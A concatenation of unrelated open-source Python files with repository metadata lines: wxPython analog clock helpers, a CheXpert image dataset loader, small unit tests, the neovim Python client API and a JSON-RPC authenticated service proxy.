def _draw(self, dc, shadow=False):
ends = [int(x) for x in strftime("%I %M %S", localtime()).split()]
flags = [self.parent.clockStyle & flag \
for flag in self.parent.allHandStyles]
a_hand = self.hands[0]
if shadow:
offset = self.parent.shadowOffset * a_hand.GetScale()
else:
offset = 0
for i, hand in enumerate(self.hands):
# Is this hand supposed to be drawn?
if flags[i]:
idx = ends[i]
# Is this the hours hand?
if i == 0:
idx = idx * 5 + ends[1] / 12 - 1
# else prevent exceptions on leap seconds
elif idx <= 0 or idx > 60:
idx = 59
# and adjust idx offset for minutes and non-leap seconds
else:
idx = idx - 1
angle = math.radians(180 - 6 * (idx + 1))
hand.dyer.Select(dc, shadow)
hand.Draw(dc, (self.radius, self.centre, angle), offset)
def Draw(self, dc):
if self.parent.clockStyle & SHOW_SHADOWS:
self._draw(dc, True)
self._draw(dc)
def RecalcCoords(self, clocksize, centre, scale):
self.centre = centre
[hand.RecalcCoords(clocksize, centre, scale) for hand in self.hands]
def SetMaxRadius(self, radius):
self.radius = radius
def GetSize(self, target):
r = []
for i, hand in enumerate(self.hands):
if _targets[i] & target:
r.append(hand.GetSize())
return tuple(r)
def GetFillColour(self, target):
r = []
for i, hand in enumerate(self.hands):
if _targets[i] & target:
r.append(hand.GetFillColour())
return tuple(r)
def GetBorderColour(self, target):
r = []
for i, hand in enumerate(self.hands):
if _targets[i] & target:
r.append(hand.GetBorderColour())
return tuple(r)
def GetBorderWidth(self, target):
r = []
for i, hand in enumerate(self.hands):
if _targets[i] & target:
r.append(hand.GetBorderWidth())
return tuple(r)
def GetShadowColour(self):
r = []
for i, hand in enumerate(self.hands):
if _targets[i] & target:
r.append(hand.GetShadowColour())
return tuple(r)
def SetSize(self, size, target):
for i, hand in enumerate(self.hands):
if _targets[i] & target:
hand.SetSize(size)
def SetFillColour(self, colour, target):
for i, hand in enumerate(self.hands):
if _targets[i] & target:
hand.SetFillColour(colour)
def SetBorderColour(self, colour, target):
for i, hand in enumerate(self.hands):
if _targets[i] & target:
hand.SetBorderColour(colour)
def SetBorderWidth(self, width, target):
for i, hand in enumerate(self.hands):
if _targets[i] & target:
hand.SetBorderWidth(width)
def SetShadowColour(self, colour):
for i, hand in enumerate(self.hands):
hand.SetShadowColour(colour)
#----------------------------------------------------------------------
class TickSet:
"""Manages a set of tick marks."""
def __init__(self, parent, **kwargs):
self.parent = parent
self.dyer = Dyer()
self.noe = {"minutes": 60, "hours": 12}[kwargs["kind"]]
self.font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
style = kwargs.pop("style")
self.kwargs = kwargs
self.SetStyle(style)
def _draw(self, dc, shadow=False):
dc.SetFont(self.font)
a_tick = self.ticks[0]
if shadow:
offset = self.parent.shadowOffset * a_tick.GetScale()
else:
offset = 0
clockStyle = self.parent.clockStyle
for idx, tick in self.ticks.items():
draw = False
# Are we a set of hours?
if self.noe == 12:
# Should we show all hours ticks?
if clockStyle & SHOW_HOURS_TICKS:
draw = True
# Or is this tick a quarter and should we show only quarters?
elif clockStyle & SHOW_QUARTERS_TICKS and not (idx + 1) % 3.:
draw = True
# Are we a set of minutes and minutes should be shown?
elif self.noe == 60 and clockStyle & SHOW_MINUTES_TICKS:
# If this tick occupies the same position of an hour/quarter
# tick, should we still draw it anyway?
if clockStyle & OVERLAP_TICKS:
draw = True
# Right, sir. I promise I won't overlap any tick.
else:
# Ensure that this tick won't overlap an hour tick.
if clockStyle & SHOW_HOURS_TICKS:
if (idx + 1) % 5.:
draw = True
# Ensure that this tick won't overlap a quarter tick.
elif clockStyle & SHOW_QUARTERS_TICKS:
if (idx + 1) % 15.:
draw = True
# We're not drawing quarters nor hours, so we can draw all
# minutes ticks.
else:
draw = True
if draw:
tick.Draw(dc, offset)
def Draw(self, dc):
if self.parent.clockStyle & SHOW_SHADOWS:
self.dyer.Select(dc, True)
self._draw(dc, True)
self.dyer.Select(dc)
self._draw(dc)
def RecalcCoords(self, clocksize, centre, scale):
a_tick = self.ticks[0]
size = a_tick.GetMaxSize(scale)
maxsize = size
# Try to find a 'good' max size for text-based ticks.
if a_tick.text is not None:
self.font.SetPointSize(size)
dc = wx.MemoryDC()
dc.SelectObject(wx.EmptyBitmap(*clocksize.Get()))
dc.SetFont(self.font)
maxsize = size
for tick in self.ticks.values():
maxsize = max(*(dc.GetTextExtent(tick.text) + (maxsize,)))
radius = self.radius = min(clocksize.Get()) / 2. - \
self.dyer.width / 2. - \
maxsize / 2. - \
a_tick.GetOffset() * scale - \
self.parent.shadowOffset * scale
# If we are a set of hours, the number of elements of this tickset is
# 12 and ticks are separated by a distance of 30 degrees;
# if we are a set of minutes, the number of elements of this tickset is
# 60 and ticks are separated by a distance of 6 degrees.
angfac = [6, 30][self.noe == 12]
for i, tick in self.ticks.items():
tick.SetClockSize(clocksize)
tick.SetScale(scale)
deg = 180 - angfac * (i + 1)
angle = math.radians(deg)
x = centre.x + radius * math.sin(angle)
y = centre.y + radius * math.cos(angle)
tick.SetPosition(wx.Point(x, y))
def GetSize(self):
return self.kwargs["size"]
def GetFillColour(self):
return self.dyer.GetFillColour()
def GetBorderColour(self):
return self.dyer.GetBorderColour()
def GetBorderWidth(self):
return self.dyer.GetBorderWidth()
def GetPolygon(self):
a_tick = self.ticks.values()[0]
return a_tick.GetPolygon()
def GetFont(self):
return self.font
def GetOffset(self):
a_tick = self.ticks[0]
return a_tick.GetOffset()
def GetShadowColour(self):
return self.dyer.GetShadowColour()
def GetIsRotated(self):
a_tick = self.ticks[0]
return a_tick.GetIsRotated()
def GetStyle(self):
return self.style
def SetSize(self, size):
self.kwargs["size"] = size
[tick.SetSize(size) for tick in self.ticks.values()]
def SetFillColour(self, colour):
self.dyer.SetFillColour(colour)
def SetBorderColour(self, colour):
self.dyer.SetBorderColour(colour)
def SetBorderWidth(self, width):
self.dyer.SetBorderWidth(width)
def SetPolygon(self, polygon):
[tick.SetPolygon(polygon) for tick in self.ticks.values()]
def SetFont(self, font):
self.font = font
def SetOffset(self, offset):
self.kwargs["offset"] = offset
[tick.SetOffset(offset) for tick in self.ticks.values()]
def SetShadowColour(self, colour):
self.dyer.SetShadowColour(colour)
def SetIsRotated(self, rotate):
self.kwargs["rotate"] = rotate
[tick.SetIsRotated(rotate) for tick in self.ticks.values()]
def SetStyle(self, style):
self.style = style
tickclass = allTickStyles[style]
self.kwargs["rotate"] = self.parent.clockStyle & ROTATE_TICKS
self.ticks = {}
for i in range(self.noe):
self.kwargs["idx"] = i
self.ticks[i] = tickclass(**self.kwargs)
#----------------------------------------------------------------------
class Box:
"""Gathers info about the clock face and tick sets."""
def __init__(self, parent, Face, TicksM, TicksH):
self.parent = parent
self.Face = Face
self.TicksH = TicksH
self.TicksM = TicksM
def GetNiceRadiusForHands(self, centre):
a_tick = self.TicksM.ticks[0]
scale = a_tick.GetScale()
bw = max(self.TicksH.dyer.width / 2. * scale,
self.TicksM.dyer.width / 2. * scale)
mgt = self.TicksM.ticks[59]
my = mgt.pos.y + mgt.GetMaxSize(scale) + bw
hgt = self.TicksH.ticks[11]
hy = hgt.pos.y + hgt.GetMaxSize(scale) + bw
niceradius = centre.y - max(my, hy)
return niceradius
def Draw(self, dc):
[getattr(self, attr).Draw(dc) \
for attr in ["Face", "TicksM", "TicksH"]]
def RecalcCoords(self, size, centre, scale):
[getattr(self, attr).RecalcCoords(size, centre, scale) \
for attr in ["Face", "TicksH", "TicksM"]]
def GetTickSize(self, target):
r = []
for i, attr in enumerate(["TicksH", "TicksM"]):
if _targets[i] & target:
tick = getattr(self, attr)
r.append(tick.GetSize())
return tuple(r)
def GetTickFillColour(self, target):
r = []
for i, attr in enumerate(["TicksH", "TicksM"]):
if _targets[i] & target:
tick = getattr(self, attr)
r.append(tick.GetFillColour())
return tuple(r)
def GetTickBorderColour(self, target):
r = []
for i, attr in enumerate(["TicksH", "TicksM"]):
if _targets[i] & target:
tick = getattr(self, attr)
r.append(tick.GetBorderColour())
return tuple(r)
def GetTickBorderWidth(self, target):
r = []
for i, attr in enumerate(["TicksH", "TicksM"]):
if _targets[i] & target:
tick = getattr(self, attr)
r.append(tick.GetBorderWidth())
return tuple(r)
def GetTickPolygon(self, target):
r = []
for i, attr in enumerate(["TicksH", "TicksM"]):
if _targets[i] & target:
tick = getattr(self, attr)
r.append(tick.GetPolygon())
return tuple(r)
def GetTickFont(self, target):
r = []
for i, attr in enumerate(["TicksH", "TicksM"]):
if _targets[i] & target:
tick = getattr(self, attr)
r.append(tick.GetFont())
return tuple(r)
def GetIsRotated(self):
a_tickset = self.TicksH
return a_tickset.GetIsRotated()
def GetTickOffset(self, target):
r = []
for i, attr in enumerate(["TicksH", "TicksM"]):
if _targets[i] & target:
tick = getattr(self, attr)
r.append(tick.GetOffset())
return tuple(r)
def GetShadowColour(self):
a_tickset = self.TicksH
return a_tickset.GetShadowColour()
def GetTickStyle(self, target):
r = []
for i, attr in enumerate(["TicksH", "TicksM"]):
if _targets[i] & target:
tick = getattr(self, attr)
r.append(tick.GetStyle())
return tuple(r)
def SetTickSize(self, size, target):
for i, attr in enumerate(["TicksH", "TicksM"]):
if _targets[i] & target:
tick = getattr(self, attr)
tick.SetSize(size)
def SetTickFillColour(self, colour, target):
for i, attr in enumerate(["TicksH", "TicksM"]):
if _targets[i] & target:
tick = getattr(self, attr)
tick.SetFillColour(colour)
def SetTickBorderColour(self, colour, target):
for i, attr in enumerate(["TicksH", "TicksM"]):
if _targets[i] & target:
tick = getattr(self, attr)
tick.SetBorderColour(colour)
def SetTickBorderWidth(self, width, target):
for i, attr in enumerate(["TicksH", "TicksM"]):
if _targets[i] & target:
tick = getattr(self, attr)
tick.SetBorderWidth(width)
def SetTickPolygon(self, polygon, target):
for i, attr in enumerate(["TicksH", "TicksM"]):
if _targets[i] & target:
tick = getattr(self, attr)
tick.SetPolygon(polygon)
def SetTickFont(self, font, target):
fs = font.GetNativeFontInfoDesc()
for i, attr in enumerate(["TicksH", "TicksM"]):
if _targets[i] & target:
tick = getattr(self, attr)
tick.SetFont(wx.FontFromNativeInfoString(fs))
def SetIsRotated(self, rotate):
[getattr(self, attr).SetIsRotated(rotate) \
for attr in ["TicksH", "TicksM"]]
def SetTickOffset(self, offset, target):
for i, attr in enumerate(["TicksH", "TicksM"]):
if _targets[i] & target:
tick = getattr(self, attr)
tick.SetOffset(offset)
def SetShadowColour(self, colour):
for attr in ["TicksH", "TicksM"]:
tick = getattr(self, attr)
tick.SetShadowColour(colour)
def SetTickStyle(self, style, target):
for i, attr in enumerate(["TicksH", "TicksM"]):
if _targets[i] & target:
tick = getattr(self, attr)
tick.SetStyle(style)
#----------------------------------------------------------------------
# Relationship between styles and ticks class names.
allTickStyles = {TICKS_BINARY: TickBinary,
TICKS_CIRCLE: TickCircle,
TICKS_DECIMAL: TickDecimal,
TICKS_HEX: TickHex,
TICKS_NONE: TickNone,
TICKS_POLY: TickPoly,
TICKS_ROMAN: TickRoman,
TICKS_SQUARE: TickSquare}
#
##
### eof
| ktan2020/legacy-automation | win/Lib/site-packages/wx-3.0-msw/wx/lib/analogclock/helpers.py | Python | mit | 28,246 |
import os
import logging
import numpy as np
from torch.utils.data import Dataset
import cv2
from PIL import Image
import subprocess
import torchvision.transforms as tfs
np.random.seed(0)
def TransCommon(image):
image = cv2.equalizeHist(image)
image = cv2.GaussianBlur(image, (3, 3), 0)
return image
def TransAug(image):
img_aug = tfs.Compose([
tfs.RandomAffine(degrees=(-15, 15), translate=(0.05, 0.05),
scale=(0.95, 1.05), fillcolor=128)
])
image = img_aug(image)
return image
def GetTransforms(image, target=None, type='common'):
# taget is not support now
if target is not None:
raise Exception(
'Target is not support now ! ')
# get type
if type.strip() == 'Common':
image = TransCommon(image)
return image
elif type.strip() == 'None':
return image
elif type.strip() == 'Aug':
image = TransAug(image)
return image
else:
raise Exception(
'Unknown transforms_type : '.format(type))
class ImageDataset(Dataset):
def __init__(self, data_path, label_path, cfg, mode='train', subsample_size=-1, subsample_seed=1234):
self.cfg = cfg
self._label_header = None
self.data_path = data_path
self._image_paths = []
self._labels = []
self._mode = mode
self.dict = [{'1.0': '1', '': '0', '0.0': '0', '-1.0': '0'},
{'1.0': '1', '': '0', '0.0': '0', '-1.0': '1'}, ]
print(f'ImageDataset constructed with data_path = {self.data_path}')
with open(label_path) as f:
header = f.readline().strip('\n').split(',')
self._label_header = [
header[7],
header[10],
header[11],
header[13],
header[15]]
for line in f:
labels = []
fields = line.strip('\n').split(',')
image_path = os.path.join(self.data_path, os.path.expanduser(fields[0]))
flg_enhance = False
for index, value in enumerate(fields[5:]):
if index == 5 or index == 8:
labels.append(self.dict[1].get(value))
if self.dict[1].get(
value) == '1' and \
self.cfg.enhance_index.count(index) > 0:
flg_enhance = True
elif index == 2 or index == 6 or index == 10:
labels.append(self.dict[0].get(value))
if self.dict[0].get(
value) == '1' and \
self.cfg.enhance_index.count(index) > 0:
flg_enhance = True
# labels = ([self.dict.get(n, n) for n in fields[5:]])
labels = list(map(int, labels))
self._image_paths.append(image_path)
self._labels.append(labels)
if flg_enhance and self._mode == 'train':
for i in range(self.cfg.enhance_times):
self._image_paths.append(image_path)
self._labels.append(labels)
self._num_image = len(self._image_paths)
# NOTE(2020.04.30) we started using explicit config of data index, so disabling this dynamic subsampling
# features to avoid confusion.
assert subsample_size == -1
# if subsample_size > 0:
# if subsample_size > self._num_image:
# raise AssertionError(f'subsample_size ({subsample_size}) should be less than {self._num_image}')
# rng = np.random.RandomState(seed=subsample_seed)
# idx = rng.choice(self._num_image, size=subsample_size, replace=False)
# self._image_paths = [self._image_paths[i] for i in idx]
# self._labels = [self._labels[i] for i in idx]
# self._num_image = len(self._labels)
if cfg.cache_bitmap:
self._bitmap_cache = self._build_bitmap_cache()
else:
self._bitmap_cache = None
def __len__(self):
return self._num_image
def _border_pad(self, image):
h, w, c = image.shape
if self.cfg.border_pad == 'zero':
image = np.pad(
image,
((0, self.cfg.long_side - h),
(0, self.cfg.long_side - w), (0, 0)),
mode='constant', constant_values=0.0
)
elif self.cfg.border_pad == 'pixel_mean':
image = np.pad(
image,
((0, self.cfg.long_side - h),
(0, self.cfg.long_side - w), (0, 0)),
mode='constant', constant_values=self.cfg.pixel_mean
)
else:
image = np.pad(
image,
((0, self.cfg.long_side - h),
(0, self.cfg.long_side - w), (0, 0)),
mode=self.cfg.border_pad
)
return image
def _fix_ratio(self, image):
h, w, c = image.shape
if h >= w:
ratio = h * 1.0 / w
h_ = self.cfg.long_side
w_ = round(h_ / ratio)
else:
ratio = w * 1.0 / h
w_ = self.cfg.long_side
h_ = round(w_ / ratio)
image = cv2.resize(image, dsize=(w_, h_),
interpolation=cv2.INTER_LINEAR)
image = self._border_pad(image)
return image
def _build_bitmap_cache(self):
print('Pre-loading all images...(might take a while)')
return [self._load_image(idx) for idx in range(self._num_image)]
def _load_image(self, idx):
image = cv2.imread(self._image_paths[idx], 0)
image = Image.fromarray(image)
return image
def __getitem__(self, idx):
if self._bitmap_cache is not None:
image = self._bitmap_cache[idx]
else:
image = self._load_image(idx)
if self._mode == 'train':
image = GetTransforms(image, type=self.cfg.use_transforms_type)
image = np.array(image)
if self.cfg.use_equalizeHist:
image = cv2.equalizeHist(image)
image = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB).astype(np.float32)
if self.cfg.fix_ratio:
image = self._fix_ratio(image)
else:
image = cv2.resize(image, dsize=(self.cfg.width, self.cfg.height),
interpolation=cv2.INTER_LINEAR)
if self.cfg.gaussian_blur > 0:
image = cv2.GaussianBlur(image, (self.cfg.gaussian_blur,
self.cfg.gaussian_blur), 0)
# normalization
image -= self.cfg.pixel_mean
# vgg and resnet do not use pixel_std, densenet and inception use.
if self.cfg.use_pixel_std:
image /= self.cfg.pixel_std
# normal image tensor : H x W x C
# torch image tensor : C X H X W
image = image.transpose((2, 0, 1))
labels = np.array(self._labels[idx]).astype(np.float32)
path = self._image_paths[idx]
if self._mode == 'train' or self._mode == 'dev':
return (image, labels)
elif self._mode == 'test':
return (image, path)
elif self._mode == 'heatmap':
return (image, path, labels)
else:
raise Exception('Unknown mode : {}'.format(self._mode))
| google-research/understanding-transfer-learning | third_party/chexpert_data/chexpert.py | Python | apache-2.0 | 7,524 |
__author__ = 'Alex Baranov'
import unittest
from time import *
import numpy as np
from ..discrete.inequalities import chernikov as c
class TestFind_system_of_fundamental_solutions(unittest.TestCase):
def _test_pulp(self):
import pulp as p
prob = p.LpProblem("The Whiskas Problem", p.LpMinimize)
elapsed = -clock()
# creating variables
x1 = p.LpVariable("ChickenPercent", 0, None, p.LpInteger)
x2 = p.LpVariable("BeefPercent", 0, None, p.LpInteger)
# goal function
a = 0.013 * x1 + 0.008 * x2
prob += 0.013 * x1 + 0.008 * x2
# constraints
prob += x1 + x2 == 100, "PercentagesSum"
prob += 0.100 * x1 + 0.200 * x2 >= 8.0, "ProteinRequirement"
prob += 0.080 * x1 + 0.100 * x2 >= 6.0, "FatRequirement"
prob += 0.001 * x1 + 0.005 * x2 <= 2.0, "FibreRequirement"
prob += 0.002 * x1 + 0.005 * x2 <= 0.4, "SaltRequirement"
# solution
prob.writeLP("WhiskasModel.lp")
prob.solve(p.GLPK(msg=0))
print "Status:", p.LpStatus[prob.status]
for v in prob.variables():
print v.name, "=", v.varValue
print "Total Cost of Ingredients per can = ", p.value(prob.objective)
elapsed = +clock()
print "Solution time = ", prob.solutionTime
print "Solution time2 = ", elapsed
def test_find_system_of_fundamental_solutions(self):
"""
Verify simple scenario for Chernikov method
"""
sys = [[-5,-5,6,-8,-10,0],[0,-5,3,1,0,-10]]
result1 = c.find_sfs_of_equation_system(sys)
expected1 = np.array([[ 12., 0., 10., 0., 0., 3.],
[ 0., 0., 8., 6., 0., 3.],
[ 0., 0., 10., 0., 6., 3.],
[ 3., 3., 5., 0., 0., 0.],
[ 0., 2., 3., 1., 0., 0.],
[ 0., 6., 10., 0., 3., 0.]])
self.assertTrue(np.array_equal(expected1,np.array(result1)))
sys2 = [[1,-1,3,-8,5],[-1,2,-1,1,-1],[2,-1,-2,1,0],[-3,1,-1,6,-3],[1,1,-3,2,-1]]
result2 = c.find_sfs_of_even_inequalities_system(sys2)
expected2 = np.array([[ 13., 0., 17., 8., 0.],
[ 15., 11., 12., 5., 0.],
[ 5., 0., 9., 4., 0.],
[ 5., 5., 8., 3., 0.],
[ 2., 0., 3., 2., 1.],
[ 11., 0., 15., 8., 0.],
[ 13., 9., 12., 7., 0.],
[ 1., 1., 1., 1., 1.]])
self.assertTrue(np.array_equal(expected2, np.array(result2)))
if __name__ == '__main__':
unittest.main()
| stonelake/pyoptimization | pyopt/tests/test_find_system_of_fundamental_solutions.py | Python | apache-2.0 | 2,808 |
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import nested_tags
def test_root():
assert nested_tags.root_method() == 'root'
def test_nested():
assert nested_tags.nested_method() == 'nested'
| GoogleCloudPlatform/repo-automation-playground | wizard-py/test_data/parser/nested_tags/nested_tags_test.py | Python | apache-2.0 | 754 |
"""Main Nvim interface."""
import os
from msgpack import ExtType
from .buffer import Buffer
from .common import (DecodeHook, Remote, RemoteMap, RemoteSequence,
SessionFilter, SessionHook, walk)
from .tabpage import Tabpage
from .window import Window
from ..compat import IS_PYTHON3
__all__ = ('Nvim')
os_chdir = os.chdir
class Nvim(object):
"""Class that represents a remote Nvim instance.
This class is main entry point to Nvim remote API, it is a thin wrapper
around Session instances.
The constructor of this class must not be called directly. Instead, the
`from_session` class method should be used to create the first instance
from a raw `Session` instance.
Subsequent instances for the same session can be created by calling the
`with_hook` instance method and passing a SessionHook instance. This can
be useful to have multiple `Nvim` objects that behave differently without
one affecting the other.
"""
@classmethod
def from_session(cls, session):
"""Create a new Nvim instance for a Session instance.
This method must be called to create the first Nvim instance, since it
queries Nvim metadata for type information and sets a SessionHook for
creating specialized objects from Nvim remote handles.
"""
session.error_wrapper = lambda e: NvimError(e[1])
channel_id, metadata = session.request(b'vim_get_api_info')
encoding = session.request(b'vim_get_option', b'encoding')
session._async_session._msgpack_stream.set_packer_encoding(encoding)
if IS_PYTHON3:
hook = DecodeHook()
# decode all metadata strings for python3
metadata = walk(hook.from_nvim, metadata, None, None, None)
types = {
metadata['types']['Buffer']['id']: Buffer,
metadata['types']['Window']['id']: Window,
metadata['types']['Tabpage']['id']: Tabpage,
}
return cls(session, channel_id, metadata).with_hook(ExtHook(types))
def __init__(self, session, channel_id, metadata):
"""Initialize a new Nvim instance. This method is module-private."""
self._session = session
self.channel_id = channel_id
self.metadata = metadata
self.vars = RemoteMap(session, 'vim_get_var', 'vim_set_var')
self.vvars = RemoteMap(session, 'vim_get_vvar', None)
self.options = RemoteMap(session, 'vim_get_option', 'vim_set_option')
self.buffers = RemoteSequence(session, 'vim_get_buffers')
self.windows = RemoteSequence(session, 'vim_get_windows')
self.tabpages = RemoteSequence(session, 'vim_get_tabpages')
self.current = Current(session)
self.error = NvimError
def with_hook(self, hook):
"""Initialize a new Nvim instance."""
return Nvim(SessionFilter(self.session, hook), self.channel_id,
self.metadata)
@property
def session(self):
"""Return the Session or SessionFilter for a Nvim instance."""
return self._session
def ui_attach(self, width, height, rgb):
"""Register as a remote UI.
After this method is called, the client will receive redraw
notifications.
"""
return self._session.request('ui_attach', width, height, rgb)
def ui_detach(self):
"""Unregister as a remote UI."""
return self._session.request('ui_detach')
def ui_try_resize(self, width, height):
"""Notify nvim that the client window has resized.
If possible, nvim will send a redraw request to resize.
"""
return self._session.request('ui_try_resize', width, height)
def subscribe(self, event):
"""Subscribe to a Nvim event."""
return self._session.request('vim_subscribe', event)
def unsubscribe(self, event):
"""Unsubscribe to a Nvim event."""
return self._session.request('vim_unsubscribe', event)
def command(self, string, async=False):
"""Execute a single ex command."""
return self._session.request('vim_command', string, async=async)
def command_output(self, string):
"""Execute a single ex command and return the output."""
return self._session.request('vim_command_output', string)
def eval(self, string, async=False):
"""Evaluate a vimscript expression."""
return self._session.request('vim_eval', string, async=async)
def strwidth(self, string):
"""Return the number of display cells `string` occupies.
Tab is counted as one cell.
"""
return self._session.request('vim_strwidth', string)
def list_runtime_paths(self):
"""Return a list of paths contained in the 'runtimepath' option."""
return self._session.request('vim_list_runtime_paths')
def foreach_rtp(self, cb):
"""Invoke `cb` for each path in 'runtimepath'.
Call the given callable for each path in 'runtimepath' until either
callable returns something but None, the exception is raised or there
are no longer paths. If stopped in case callable returned non-None,
vim.foreach_rtp function returns the value returned by callable.
"""
for path in self._session.request('vim_list_runtime_paths'):
try:
if cb(path) is not None:
break
except Exception:
break
def chdir(self, dir_path):
"""Run os.chdir, then all appropriate vim stuff."""
os_chdir(dir_path)
return self._session.request('vim_change_directory', dir_path)
def feedkeys(self, keys, options='', escape_csi=True):
"""Push `keys` to Nvim user input buffer.
Options can be a string with the following character flags:
- 'm': Remap keys. This is default.
- 'n': Do not remap keys.
- 't': Handle keys as if typed; otherwise they are handled as if coming
from a mapping. This matters for undo, opening folds, etc.
"""
return self._session.request('vim_feedkeys', keys, options, escape_csi)
def input(self, bytes):
"""Push `bytes` to Nvim low level input buffer.
Unlike `feedkeys()`, this uses the lowest level input buffer and the
call is not deferred. It returns the number of bytes actually
written(which can be less than what was requested if the buffer is
full).
"""
return self._session.request('vim_input', bytes)
def replace_termcodes(self, string, from_part=False, do_lt=True,
special=True):
r"""Replace any terminal code strings by byte sequences.
The returned sequences are Nvim's internal representation of keys,
for example:
<esc> -> '\x1b'
<cr> -> '\r'
<c-l> -> '\x0c'
<up> -> '\x80ku'
The returned sequences can be used as input to `feedkeys`.
"""
return self._session.request('vim_replace_termcodes', string,
from_part, do_lt, special)
def out_write(self, msg):
"""Print `msg` as a normal message."""
return self._session.request('vim_out_write', msg)
def err_write(self, msg):
"""Print `msg` as an error message."""
return self._session.request('vim_err_write', msg)
def quit(self, quit_command='qa!'):
"""Send a quit command to Nvim.
By default, the quit command is 'qa!' which will make Nvim quit without
saving anything.
"""
try:
self.command(quit_command)
except IOError:
# sending a quit command will raise an IOError because the
# connection is closed before a response is received. Safe to
# ignore it.
pass
class Current(object):
"""Helper class for emulating vim.current from python-vim."""
def __init__(self, session):
self._session = session
self.range = None
@property
def line(self):
return self._session.request('vim_get_current_line')
@line.setter
def line(self, line):
return self._session.request('vim_set_current_line', line)
@property
def buffer(self):
return self._session.request('vim_get_current_buffer')
@buffer.setter
def buffer(self, buffer):
return self._session.request('vim_set_current_buffer', buffer)
@property
def window(self):
return self._session.request('vim_get_current_window')
@window.setter
def window(self, window):
return self._session.request('vim_set_current_window', window)
@property
def tabpage(self):
return self._session.request('vim_get_current_tabpage')
@tabpage.setter
def tabpage(self, tabpage):
return self._session.request('vim_set_current_tabpage', tabpage)
class ExtHook(SessionHook):
def __init__(self, types):
self.types = types
super(ExtHook, self).__init__(from_nvim=self.from_ext,
to_nvim=self.to_ext)
def from_ext(self, obj, session, method, kind):
if type(obj) is ExtType:
cls = self.types[obj.code]
return cls(session, (obj.code, obj.data))
return obj
def to_ext(self, obj, session, method, kind):
if isinstance(obj, Remote):
return ExtType(*obj.code_data)
return obj
class NvimError(Exception):
pass
| 0x90sled/python-client | neovim/api/nvim.py | Python | apache-2.0 | 9,543 |
"""
Copyright 2011 Jeff Garzik
AuthServiceProxy has the following improvements over python-jsonrpc's
ServiceProxy class:
- HTTP connections persist for the life of the AuthServiceProxy object
(if server supports HTTP/1.1)
- sends protocol 'version', per JSON-RPC 1.1
- sends proper, incrementing 'id'
- sends Basic HTTP authentication headers
- parses all JSON numbers that look like floats as Decimal
- uses standard Python json lib
Previous copyright, from python-jsonrpc/jsonrpc/proxy.py:
Copyright (c) 2007 Jan-Klaas Kollhof
This file is part of jsonrpc.
jsonrpc is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 2.1 of the License, or
(at your option) any later version.
This software is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this software; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
try:
import http.client as httplib
except ImportError:
import httplib
import base64
import decimal
import json
import logging
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
USER_AGENT = "AuthServiceProxy/0.1"
HTTP_TIMEOUT = 30
log = logging.getLogger("DiamondRPC")
class JSONRPCException(Exception):
def __init__(self, rpc_error):
Exception.__init__(self)
self.error = rpc_error
def EncodeDecimal(o):
if isinstance(o, decimal.Decimal):
return round(o, 8)
raise TypeError(repr(o) + " is not JSON serializable")
class AuthServiceProxy(object):
__id_count = 0
def __init__(self, service_url, service_name=None, timeout=HTTP_TIMEOUT, connection=None):
self.__service_url = service_url
self.__service_name = service_name
self.__url = urlparse.urlparse(service_url)
if self.__url.port is None:
port = 80
else:
port = self.__url.port
(user, passwd) = (self.__url.username, self.__url.password)
try:
user = user.encode('utf8')
except AttributeError:
pass
try:
passwd = passwd.encode('utf8')
except AttributeError:
pass
authpair = user + b':' + passwd
self.__auth_header = b'Basic ' + base64.b64encode(authpair)
if connection:
# Callables re-use the connection of the original proxy
self.__conn = connection
elif self.__url.scheme == 'https':
self.__conn = httplib.HTTPSConnection(self.__url.hostname, port,
None, None, False,
timeout)
else:
self.__conn = httplib.HTTPConnection(self.__url.hostname, port,
False, timeout)
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
if self.__service_name is not None:
name = "%s.%s" % (self.__service_name, name)
return AuthServiceProxy(self.__service_url, name, connection=self.__conn)
def __call__(self, *args):
AuthServiceProxy.__id_count += 1
log.debug("-%s-> %s %s"%(AuthServiceProxy.__id_count, self.__service_name,
json.dumps(args, default=EncodeDecimal)))
postdata = json.dumps({'version': '1.1',
'method': self.__service_name,
'params': args,
'id': AuthServiceProxy.__id_count}, default=EncodeDecimal)
self.__conn.request('POST', self.__url.path, postdata,
{'Host': self.__url.hostname,
'User-Agent': USER_AGENT,
'Authorization': self.__auth_header,
'Content-type': 'application/json'})
response = self._get_response()
if response['error'] is not None:
raise JSONRPCException(response['error'])
elif 'result' not in response:
raise JSONRPCException({
'code': -343, 'message': 'missing JSON-RPC result'})
else:
return response['result']
def _batch(self, rpc_call_list):
postdata = json.dumps(list(rpc_call_list), default=EncodeDecimal)
log.debug("--> "+postdata)
self.__conn.request('POST', self.__url.path, postdata,
{'Host': self.__url.hostname,
'User-Agent': USER_AGENT,
'Authorization': self.__auth_header,
'Content-type': 'application/json'})
return self._get_response()
def _get_response(self):
http_response = self.__conn.getresponse()
if http_response is None:
raise JSONRPCException({
'code': -342, 'message': 'missing HTTP response from server'})
responsedata = http_response.read().decode('utf8')
response = json.loads(responsedata, parse_float=decimal.Decimal)
if "error" in response and response["error"] is None:
log.debug("<-%s- %s"%(response["id"], json.dumps(response["result"], default=EncodeDecimal)))
else:
log.debug("<-- "+responsedata)
return response
| TGDiamond/Diamond | qa/rpc-tests/python-diamondrpc/diamondrpc/authproxy.py | Python | mit | 5,784 |
#!/usr/bin/env ambari-python-wrap
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
